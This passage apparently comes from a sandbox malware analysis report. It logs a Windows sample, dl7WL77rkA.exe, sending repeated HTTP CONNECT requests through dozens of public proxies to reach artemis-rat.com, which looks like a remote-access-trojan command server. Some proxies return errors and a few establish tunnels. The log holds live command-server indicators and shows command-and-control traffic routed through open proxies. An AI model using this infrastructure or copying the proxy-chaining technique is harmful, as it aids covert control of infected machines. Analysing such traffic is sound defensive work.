                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.592597961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.702131033 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.592946053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.405174017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.202095032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.092616081 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1388192.168.2.55380868.71.249.153486063876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.887212992 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1389192.168.2.553676185.110.190.99803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.887428999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.208940029 CET | 327 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1390192.168.2.553571203.124.53.12256783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.918139935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1391192.168.2.55374447.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.919640064 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1392192.168.2.553789135.148.139.15110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.955616951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1393192.168.2.553629223.113.80.15890913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.956027985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.416925907 CET | 325 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1394192.168.2.553680202.139.198.1530303876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.958268881 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.108352900 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1395192.168.2.553726195.35.25.94803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.981933117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.918090105 CET | 805 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1396192.168.2.553753186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.981935024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1397192.168.2.553773159.223.71.71603773876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.984488010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1398192.168.2.55376247.106.76.19680883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.984738111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.319138050 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1399 | 192.168.2.5 | 53379 | 189.240.60.169 | 9090 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.985126019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.256108999 CET | 72 | IN | HTTP/1.1 200 Connection established
Proxy-Agent: Fortinet-Proxy/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1400 | 192.168.2.5 | 53763 | 37.18.73.60 | 5566 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.985318899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.331629992 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1401 | 192.168.2.5 | 53777 | 211.222.252.187 | 8193 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.012263060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1402192.168.2.552343107.148.201.157803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.014247894 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.092818022 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.092921972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.202092886 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1403 | 192.168.2.5 | 53693 | 3.108.115.48 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.043230057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.444669962 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:44 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1404 | 192.168.2.5 | 53745 | 167.172.86.46 | 10471 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.043637037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1405192.168.2.553796130.162.213.17580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.043946028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.367961884 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1406192.168.2.55377141.65.236.5719763876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.050503969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.092307091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.406167984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207719088 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.499191046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.905025959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1407192.168.2.55236091.187.113.6880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.091183901 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.005601883 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1408192.168.2.553811192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.091458082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1409192.168.2.553779113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.095860958 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1410192.168.2.552365103.124.137.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.096786022 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.394287109 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1411192.168.2.553128184.178.172.2641453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.098514080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1412192.168.2.5538121.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.098710060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1413192.168.2.553785111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.098941088 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1414192.168.2.553813185.125.169.2481183876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.109834909 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.527471066 CET | 131 | IN | HTTP/1.1 503 Too many open connections
Content-Type: text/plain
Connection: close
Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
Data Ascii: Maximum number of open connections reached.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1415192.168.2.553794102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.121809959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1416192.168.2.553814147.139.140.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.122401953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.308583975 CET | 104 | IN | HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.37 (Alibaba Cloud Linux) OpenSSL/1.1.1k
Mar 11, 2024 03:30:45.310197115 CET | 177 | OUT | Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c d4 c3 34 04 20 fd 59 5e 23 e8 f8 df f7 34 a0 31 bf 01 a9 63 33 07 d4 63 86 eb 92 35 63 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
Data Ascii: el4 Y^#41c3c5c*,+0/$#('=<5/Uartemis-rat.com#
Mar 11, 2024 03:30:46.462603092 CET | 736 | IN | Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1417192.168.2.55341043.129.228.4678913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.123373985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
